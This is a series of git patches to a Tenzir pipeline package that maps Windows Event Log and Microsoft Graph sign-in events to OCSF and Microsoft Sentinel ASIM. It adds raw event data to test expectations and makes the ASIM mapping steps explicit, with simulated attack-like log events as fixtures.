diff --git a/microsoft/tests/ocsf/eid-4722.tql b/microsoft/tests/ocsf/eid-4722.tql
index 97da69e..57418cf 100644
--- a/microsoft/tests/ocsf/eid-4722.tql
+++ b/microsoft/tests/ocsf/eid-4722.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4722.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4722.txt b/microsoft/tests/ocsf/eid-4722.txt
index 8313d16..17190f3 100644
--- a/microsoft/tests/ocsf/eid-4722.txt
+++ b/microsoft/tests/ocsf/eid-4722.txt
@@ -41,6 +41,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4722\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98770\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n \n\n",
+ raw_data_size: 1050,
 severity: "Informational",
 severity_id: 1,
 time: 2024-03-23T12:34:56.789012300Z,
diff --git a/microsoft/tests/ocsf/eid-4725.tql b/microsoft/tests/ocsf/eid-4725.tql
index 72d581b..8abca0d 100644
--- a/microsoft/tests/ocsf/eid-4725.tql
+++ b/microsoft/tests/ocsf/eid-4725.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4725.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4725.txt b/microsoft/tests/ocsf/eid-4725.txt
index 2ec1e11..7032194 100644
--- a/microsoft/tests/ocsf/eid-4725.txt
+++ b/microsoft/tests/ocsf/eid-4725.txt
@@ -41,6 +41,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4725\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98773\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n \n\n",
+ raw_data_size: 1050,
 severity: "Informational",
 severity_id: 1,
 time: 2024-03-23T12:34:56.789012300Z,
diff --git a/microsoft/tests/ocsf/eid-4726.tql b/microsoft/tests/ocsf/eid-4726.tql
index ef7f4cc..fdfdfd0 100644
--- a/microsoft/tests/ocsf/eid-4726.tql
+++ b/microsoft/tests/ocsf/eid-4726.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4726.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4726.txt b/microsoft/tests/ocsf/eid-4726.txt
index 1cdb6a2..87ce402 100644
--- a/microsoft/tests/ocsf/eid-4726.txt
+++ b/microsoft/tests/ocsf/eid-4726.txt
@@ -41,6 +41,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4726\n 0\n 0\n 13824\n 0x8020000000000000\n \n 98774\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n backdoor_svc\n CORP\n S-1-5-21-3107921522-2185401913-891411500-1500\n -\n \n\n",
+ raw_data_size: 1090,
 severity: "Informational",
 severity_id: 1,
 time: 2024-03-23T12:34:56.789012300Z,
diff --git a/microsoft/tests/ocsf/eid-4728.tql b/microsoft/tests/ocsf/eid-4728.tql
index f13f6c9..477cbac 100644
--- a/microsoft/tests/ocsf/eid-4728.tql
+++ b/microsoft/tests/ocsf/eid-4728.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4728.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4728.txt b/microsoft/tests/ocsf/eid-4728.txt
index 5f2665d..1678517 100644
--- a/microsoft/tests/ocsf/eid-4728.txt
+++ b/microsoft/tests/ocsf/eid-4728.txt
@@ -46,6 +46,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4728\n 0\n 0\n 13826\n 0x8020000000000000\n \n 98776\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n CN=backdoor_svc,CN=Users,DC=corp,DC=local\n S-1-5-21-3107921522-2185401913-891411500-1500\n DomainAdmins\n CORP\n S-1-5-21-3107921522-2185401913-891411500-512\n -\n \n\n",
+ raw_data_size: 1246,
 severity: "Informational",
 severity_id: 1,
 time: 2024-03-23T12:34:56.789012300Z,
diff --git a/microsoft/tests/ocsf/eid-4730.tql b/microsoft/tests/ocsf/eid-4730.tql
index 504daa0..f41795b 100644
--- a/microsoft/tests/ocsf/eid-4730.tql
+++ b/microsoft/tests/ocsf/eid-4730.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4730.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4730.txt b/microsoft/tests/ocsf/eid-4730.txt
index 97eb1f7..c9fdd11 100644
--- a/microsoft/tests/ocsf/eid-4730.txt
+++ b/microsoft/tests/ocsf/eid-4730.txt
@@ -46,6 +46,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4730\n 0\n 0\n 13827\n 0x8020000000000000\n \n 98778\n \n \n Security\n DC01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n OldAdmins\n CORP\n S-1-5-21-3107921522-2185401913-891411500-2000\n -\n \n\n",
+ raw_data_size: 1087,
 severity: "Informational",
 severity_id: 1,
 time: 2024-03-23T12:34:56.789012300Z,
diff --git a/microsoft/tests/ocsf/eid-4732.tql b/microsoft/tests/ocsf/eid-4732.tql
index 6f20bbb..7eebaaa 100644
--- a/microsoft/tests/ocsf/eid-4732.tql
+++ b/microsoft/tests/ocsf/eid-4732.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4732.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4732.txt b/microsoft/tests/ocsf/eid-4732.txt
index d7db2d9..d424e03 100644
--- a/microsoft/tests/ocsf/eid-4732.txt
+++ b/microsoft/tests/ocsf/eid-4732.txt
@@ -46,6 +46,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4732\n 0\n 0\n 13826\n 0x8020000000000000\n \n 98768\n \n \n Security\n WINHOST01.corp.local\n \n \n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n CN=backdoor_svc,CN=Users,DC=corp,DC=local\n S-1-5-21-3107921522-2185401913-891411500-1500\n Administrators\n Builtin\n S-1-5-32-544\n -\n \n\n",
+ raw_data_size: 1224,
 severity: "Informational",
 severity_id: 1,
 time: 2024-03-23T12:34:56.789012300Z,
diff --git a/microsoft/tests/ocsf/eid-4769.tql b/microsoft/tests/ocsf/eid-4769.tql
index a1e5d6d..b3aab4a 100644
--- a/microsoft/tests/ocsf/eid-4769.tql
+++ b/microsoft/tests/ocsf/eid-4769.tql
@@ -1,8 +1,11 @@
 from_file f"{env("TENZIR_INPUTS")}/eid-4769.xml" { read_all }
-this = data.parse_winlog()
-microsoft::windows::ocsf::map
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
 ocsf::derive
 ocsf::cast
diff --git a/microsoft/tests/ocsf/eid-4769.txt b/microsoft/tests/ocsf/eid-4769.txt
index b8fb350..a7c572c 100644
--- a/microsoft/tests/ocsf/eid-4769.txt
+++ b/microsoft/tests/ocsf/eid-4769.txt
@@ -34,6 +34,8 @@
 ],
 version: "1.8.0",
 },
+ raw_data: "\n \n \n 4769\n 0\n 0\n 14337\n 0x8020000000000000\n \n 98769\n \n \n Security\n DC01.corp.local\n \n \n jdoe@CORP.LOCAL\n CORP.LOCAL\n cifs/fileserver.corp.local\n S-1-5-21-3107921522-2185401913-891411500-1103\n 0x40810000\n 0x12\n ::ffff:10.0.0.42\n 49827\n 0x0\n {B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}\n -\n \n\n",
+ raw_data_size: 1239,
 session: {
 uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}",
 },
diff --git a/microsoft/tests/ocsf/eid-4771.tql b/microsoft/tests/ocsf/eid-4771.tql
index f80b305..60c788d 100644
--- a/microsoft/tests/ocsf/eid-4771.tql
+++ b/microsoft/tests/ocsf/eid-4771.tql
@@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4771.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4771.txt b/microsoft/tests/ocsf/eid-4771.txt index 8d74b30..0869d83 100644 --- a/microsoft/tests/ocsf/eid-4771.txt +++ b/microsoft/tests/ocsf/eid-4771.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4771\n 0\n 0\n 14339\n 0x8020000000000000\n \n 98770\n \n \n Security\n DC01.corp.local\n \n \n krbtgt\n S-1-5-21-3107921522-2185401913-891411500-502\n krbtgt/CORP.LOCAL\n 0x40810010\n 0x18\n 2\n ::ffff:10.0.0.42\n 49827\n -\n -\n -\n \n\n", + raw_data_size: 1162, severity: "Low", severity_id: 2, src_endpoint: { diff --git a/microsoft/tests/ocsf/eid-4776.tql b/microsoft/tests/ocsf/eid-4776.tql index 84842a4..0079bd1 100644 --- a/microsoft/tests/ocsf/eid-4776.tql +++ b/microsoft/tests/ocsf/eid-4776.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4776.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-4776.txt b/microsoft/tests/ocsf/eid-4776.txt index 72b7693..4c7d402 100644 --- a/microsoft/tests/ocsf/eid-4776.txt +++ b/microsoft/tests/ocsf/eid-4776.txt @@ -33,6 +33,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4776\n 0\n 0\n 14336\n 0x8020000000000000\n \n 98771\n \n \n Security\n DC01.corp.local\n \n \n MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n Administrator\n WINHOST01\n 0xC000006A\n \n\n", + raw_data_size: 862, severity: "Informational", severity_id: 1, src_endpoint: { 
diff --git a/microsoft/tests/ocsf/eid-5001.tql b/microsoft/tests/ocsf/eid-5001.tql index 40e51f6..5f06648 100644 --- a/microsoft/tests/ocsf/eid-5001.tql +++ b/microsoft/tests/ocsf/eid-5001.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-5001.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-5001.txt b/microsoft/tests/ocsf/eid-5001.txt index b176845..87cc570 100644 --- a/microsoft/tests/ocsf/eid-5001.txt +++ b/microsoft/tests/ocsf/eid-5001.txt @@ -38,6 +38,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 5001\n 0\n 3\n 0\n 0x8000000000000000\n \n 45001\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n \n\n", + raw_data_size: 779, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-5007.tql b/microsoft/tests/ocsf/eid-5007.tql index 2d916dc..f60c7f9 100644 --- a/microsoft/tests/ocsf/eid-5007.tql +++ b/microsoft/tests/ocsf/eid-5007.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-5007.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-5007.txt b/microsoft/tests/ocsf/eid-5007.txt index 38eb39f..73a61c3 100644 --- a/microsoft/tests/ocsf/eid-5007.txt +++ b/microsoft/tests/ocsf/eid-5007.txt 
@@ -38,6 +38,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 5007\n 0\n 4\n 0\n 0x8000000000000000\n \n 45007\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Windows Defender Antivirus\n 4.18.24010.12\n HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x0\n HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x1\n \n\n", + raw_data_size: 1035, severity: "High", severity_id: 4, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-6005.tql b/microsoft/tests/ocsf/eid-6005.tql index 7125358..fb03d3c 100644 --- a/microsoft/tests/ocsf/eid-6005.tql +++ b/microsoft/tests/ocsf/eid-6005.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-6005.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-6005.txt b/microsoft/tests/ocsf/eid-6005.txt index a1e0dd4..a05a29c 100644 --- a/microsoft/tests/ocsf/eid-6005.txt +++ b/microsoft/tests/ocsf/eid-6005.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 6005\n 0\n 4\n 0\n 0x8080000000000000\n \n 1\n \n \n System\n WINHOST01.corp.local\n \n \n The Event log service was started.\n \n\n", + raw_data_size: 591, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-6006.tql b/microsoft/tests/ocsf/eid-6006.tql index ea2511d..9febc1f 100644 --- a/microsoft/tests/ocsf/eid-6006.tql +++ b/microsoft/tests/ocsf/eid-6006.tql 
@@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-6006.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-6006.txt b/microsoft/tests/ocsf/eid-6006.txt index da234e2..156920d 100644 --- a/microsoft/tests/ocsf/eid-6006.txt +++ b/microsoft/tests/ocsf/eid-6006.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 6006\n 0\n 4\n 0\n 0x8080000000000000\n \n 2\n \n \n System\n WINHOST01.corp.local\n \n \n The Event log service was stopped.\n \n\n", + raw_data_size: 591, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:58.123456700Z, diff --git a/microsoft/tests/ocsf/eid-7034.tql b/microsoft/tests/ocsf/eid-7034.tql index 8423e23..b5c8200 100644 --- a/microsoft/tests/ocsf/eid-7034.tql +++ b/microsoft/tests/ocsf/eid-7034.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-7034.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-7034.txt b/microsoft/tests/ocsf/eid-7034.txt index f65ca69..34c3442 100644 --- a/microsoft/tests/ocsf/eid-7034.txt +++ b/microsoft/tests/ocsf/eid-7034.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 7034\n 0\n 2\n 0\n 0x8080000000000000\n \n 44321\n \n \n System\n WINHOST01.corp.local\n \n \n PayloadSvc\n 1\n \n\n", + raw_data_size: 759, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-7045.tql b/microsoft/tests/ocsf/eid-7045.tql index 26e225f..66c7eab 100644 --- a/microsoft/tests/ocsf/eid-7045.tql +++ b/microsoft/tests/ocsf/eid-7045.tql 
@@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-7045.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-7045.txt b/microsoft/tests/ocsf/eid-7045.txt index 23521d6..1dde7b2 100644 --- a/microsoft/tests/ocsf/eid-7045.txt +++ b/microsoft/tests/ocsf/eid-7045.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 7045\n 0\n 4\n 0\n 0x8080000000000000\n \n 44322\n \n \n System\n WINHOST01.corp.local\n \n \n PayloadSvc\n C:\\tmp\\payload.exe --svc\n Own Process\n Auto Start\n LocalSystem\n \n\n", + raw_data_size: 931, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-9999.tql b/microsoft/tests/ocsf/eid-9999.tql index fe23989..c407776 100644 --- a/microsoft/tests/ocsf/eid-9999.tql +++ b/microsoft/tests/ocsf/eid-9999.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-9999.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-9999.txt b/microsoft/tests/ocsf/eid-9999.txt index b97390e..7e4516e 100644 --- a/microsoft/tests/ocsf/eid-9999.txt +++ b/microsoft/tests/ocsf/eid-9999.txt @@ -31,6 +31,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 9999\n 0\n 4\n 0\n 0x8000000000000000\n \n 999900\n \n \n Example\n WINHOST01.corp.local\n \n \n Unsupported Windows event\n \n\n", + raw_data_size: 665, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, From 99ab77f7496ccd27a37075e6f9914ff73b08fd1f Mon Sep 17 00:00:00 2001 
From: Matthias Vallentin
Date: Mon, 8 Jun 2026 18:56:15 +0200
Subject: [PATCH 18/27] Compose Microsoft ASIM mapping explicitly
Make microsoft::asim::map expect OCSF input instead of hiding the Microsoft-to-OCSF conversion and OCSF derive/cast steps. Add examples that show the explicit OCSF-to-ASIM pipeline for Windows XML and Graph sign-ins.
Assisted-by: GPT-5 Codex (Superconductor)
---
microsoft/examples/graph-sign-ins-to-asim.tql | 19 +++++++++++++++++++
.../examples/windows-event-log-to-asim.tql | 18 ++++++++++++++++++
microsoft/operators/asim/map.tql | 16 ++--------------
microsoft/tests/asim/graph.tql | 5 +++++
microsoft/tests/asim/windows.tql | 8 +++++++-
microsoft/tests/asim/windows.txt | 2 ++
6 files changed, 53 insertions(+), 15 deletions(-)
create mode 100644 microsoft/examples/graph-sign-ins-to-asim.tql
create mode 100644 microsoft/examples/windows-event-log-to-asim.tql
diff --git a/microsoft/examples/graph-sign-ins-to-asim.tql b/microsoft/examples/graph-sign-ins-to-asim.tql
new file mode 100644
index 0000000..193eb60
--- /dev/null
+++ b/microsoft/examples/graph-sign-ins-to-asim.tql
@@ -0,0 +1,19 @@
+---
+name: Microsoft Graph sign-ins -> ASIM
+description: Fetch recent Microsoft Entra ID sign-in logs, map them through OCSF, and convert them to Microsoft Sentinel ASIM.
+---
+
+microsoft::graph::sign_ins \
+ tenant_id="TENANT_ID",
+ client_id="CLIENT_ID",
+ client_secret=secret("CLIENT_SECRET"),
+ lookback=5m
+@name = "microsoft.graph.sign_in"
+event = this
+microsoft::ocsf::map event=event
+this = event
+ocsf::derive
+ocsf::cast
+event = this
+microsoft::asim::map event=event
+this = event
diff --git a/microsoft/examples/windows-event-log-to-asim.tql b/microsoft/examples/windows-event-log-to-asim.tql
new file mode 100644
index 0000000..b5ba3c3
--- /dev/null
+++ b/microsoft/examples/windows-event-log-to-asim.tql
@@ -0,0 +1,18 @@
+---
+name: Windows Event Log XML -> ASIM
+description: Parse Windows Event Log XML, map it through OCSF, and convert it to Microsoft Sentinel ASIM.
+---
+
+from_file "windows-event.xml" {
+ read_all
+}
+win = data.parse_winlog()
+microsoft::windows::ocsf::map event=win
+win.raw_data = move data
+win.raw_data_size = win.raw_data.length_bytes()
+this = win
+ocsf::derive
+ocsf::cast
+event = this
+microsoft::asim::map event=event
+this = event
diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql
index 6a6e56c..9bdc15d 100644
--- a/microsoft/operators/asim/map.tql
+++ b/microsoft/operators/asim/map.tql
@@ -1,22 +1,10 @@
 ---
-description: Maps supported Microsoft events to Microsoft Sentinel ASIM.
+description: Maps validated Microsoft OCSF events to Microsoft Sentinel ASIM.
 args:
 named:
 - name: event
- description: The field that holds the Microsoft event to map.
+ description: The field that holds the OCSF event to map.
 type: field
 ---
-if $event.class_uid? == null {
- microsoft::ocsf::map event=$event
- _microsoft_outer = this
- _microsoft_event = $event
- this = _microsoft_event
- ocsf::derive
- ocsf::cast
- _microsoft_outer._microsoft_event = this
- this = _microsoft_outer
- $event = move _microsoft_event
-}
-
 microsoft::asim::ocsf::map event=$event
diff --git a/microsoft/tests/asim/graph.tql b/microsoft/tests/asim/graph.tql
index 1786139..ec0b8ec 100644
--- a/microsoft/tests/asim/graph.tql
+++ b/microsoft/tests/asim/graph.tql
@@ -3,6 +3,11 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" {
 }
 @name = "microsoft.graph.sign_in"
 event = this
+microsoft::ocsf::map event=event
+this = event
+ocsf::derive
+ocsf::cast
+event = this
 microsoft::asim::map event=event
 this = event
 name = @name
diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql
index cd97789..380fadb 100644
--- a/microsoft/tests/asim/windows.tql
+++ b/microsoft/tests/asim/windows.tql
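Review bot: Nothing in the remaining body of `microsoft::asim::map` verifies that `$event` is already OCSF now that the `$event.class_uid? == null` branch is gone, so a caller that forgets `microsoft::ocsf::map`, `ocsf::derive` and `ocsf::cast` presumably lands in the generic "unsupported OCSF to ASIM mapping" assertion of `microsoft::asim::ocsf::map` rather than in a message naming the missing step. With the wrapper reduced to one line, the contract belongs in its front matter: `description: Maps validated Microsoft OCSF events (the output of microsoft::ocsf::map, ocsf::derive and ocsf::cast) to Microsoft Sentinel ASIM.` The two examples added in this commit show the intended order and are the natural place to point to from that description.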
@@ -1,7 +1,13 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" { read_all } -this = data.parse_winlog() +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win +ocsf::derive +ocsf::cast event = this microsoft::asim::map event=event this = event diff --git a/microsoft/tests/asim/windows.txt b/microsoft/tests/asim/windows.txt index 90b178f..6f7df95 100644 --- a/microsoft/tests/asim/windows.txt +++ b/microsoft/tests/asim/windows.txt @@ -82,6 +82,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 4624\n 2\n 0\n 12544\n 0x8020000000000000\n \n 98761\n \n \n Security\n DC01.corp.local\n \n \n S-1-0-0\n -\n -\n 0x0\n S-1-5-21-3107921522-2185401913-891411500-1104\n jdoe\n CORP\n 0xA1B2C3\n 3\n Kerberos\n Kerberos\n -\n {B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}\n -\n -\n 0\n 0x0\n -\n 10.0.0.42\n 49827\n %%1833\n -\n -\n -\n %%1843\n 0x0\n %%1842\n \n\n", + raw_data_size: 1918, session: { uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", uid_alt: "0xA1B2C3", From 83c2b18063e56d7802506a21d34564c79418bd07 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 18:58:01 +0200 Subject: [PATCH 19/27] Document future ASIM map bridge Leave the Microsoft ASIM wrapper as an OCSF-only mapper for now, but document the intended source-to-ASIM bridge once OCSF derive and cast support field-targeted operation. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/map.tql | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql index 9bdc15d..526533d 100644 --- a/microsoft/operators/asim/map.tql +++ b/microsoft/operators/asim/map.tql 
@@ -7,4 +7,15 @@ args:
 type: field
 ---
+// If `ocsf::derive` and `ocsf::cast` gain `event=` support, this wrapper can
+// also bridge Microsoft source events to ASIM without temporarily replacing
+// `this`:
+//
+// if $event.class_uid? == null {
+// microsoft::ocsf::map event=$event
+// ocsf::derive event=$event
+// ocsf::cast event=$event
+// }
+//
+// Until then, callers compose these steps explicitly before invoking this UDO.
 microsoft::asim::ocsf::map event=$event
From f77184254e6a1a6d049940c32f6a32a76b6770cf Mon Sep 17 00:00:00 2001
From: Matthias Vallentin
Date: Thu, 11 Jun 2026 17:10:33 +0200
Subject: [PATCH 20/27] Simplify unsupported ASIM map test
Call the OCSF-to-ASIM mapper with this directly in the unsupported mapping fixture. Without strict, the assertion remains a warning instead of making the test expect a failing pipeline.
Assisted-by: GPT-5 (Codex)
---
microsoft/tests/asim/ocsf/map.tql | 9 +--------
microsoft/tests/asim/ocsf/map.txt | 2 +-
2 files changed, 2 insertions(+), 9 deletions(-)
diff --git a/microsoft/tests/asim/ocsf/map.tql b/microsoft/tests/asim/ocsf/map.tql
index 951d4c7..e6278b8 100644
--- a/microsoft/tests/asim/ocsf/map.tql
+++ b/microsoft/tests/asim/ocsf/map.tql
@@ -1,7 +1,3 @@
----
-error: true
----
-
 from {
 activity_id: 1,
 activity_name: "Execute",
@@ -25,7 +21,4 @@ from {
 },
 }
 @name = "ocsf.script_activity"
-strict {
- event = this
- microsoft::asim::ocsf::map event=event
-}
+microsoft::asim::ocsf::map event=this
diff --git a/microsoft/tests/asim/ocsf/map.txt b/microsoft/tests/asim/ocsf/map.txt
index 44a4da6..7bb1d80 100644
--- a/microsoft/tests/asim/ocsf/map.txt
+++ b/microsoft/tests/asim/ocsf/map.txt
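Review bot: Removing `strict { ... }` together with the `error: true` front matter turns this fixture into a warning-only check, so this test no longer proves that an unsupported OCSF class can fail a pipeline; if `microsoft/tests/ocsf-to-asim/unsupported-strict.tql` from the first commit of this series still covers the strict path, a comment above the mapper call should say so, e.g. `// Non-strict variant: the unsupported class only warns; the failing case lives in tests/ocsf-to-asim/unsupported-strict.tql.` Operationally the warning means the event presumably continues downstream unmapped, which is worth stating in the mapper's description so consumers expecting ASIM columns know to wrap the call in `strict` or to filter on the assertion.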
@@ -1 +1 @@
-error: assertion failed: {reason:"unsupported OCSF to ASIM mapping",class_uid:1009,class_name:"Script Activity",type_uid:100901,type_name:"Script Activity: Execute",name:"ocsf.script_activity"}
+warning: assertion failed: {reason:"unsupported OCSF to ASIM mapping",class_uid:1009,class_name:"Script Activity",type_uid:100901,type_name:"Script Activity: Execute",name:"ocsf.script_activity"}
From 5679aaf4658b87ab9dcf6d4e92d6f0e87c4a5d1e Mon Sep 17 00:00:00 2001
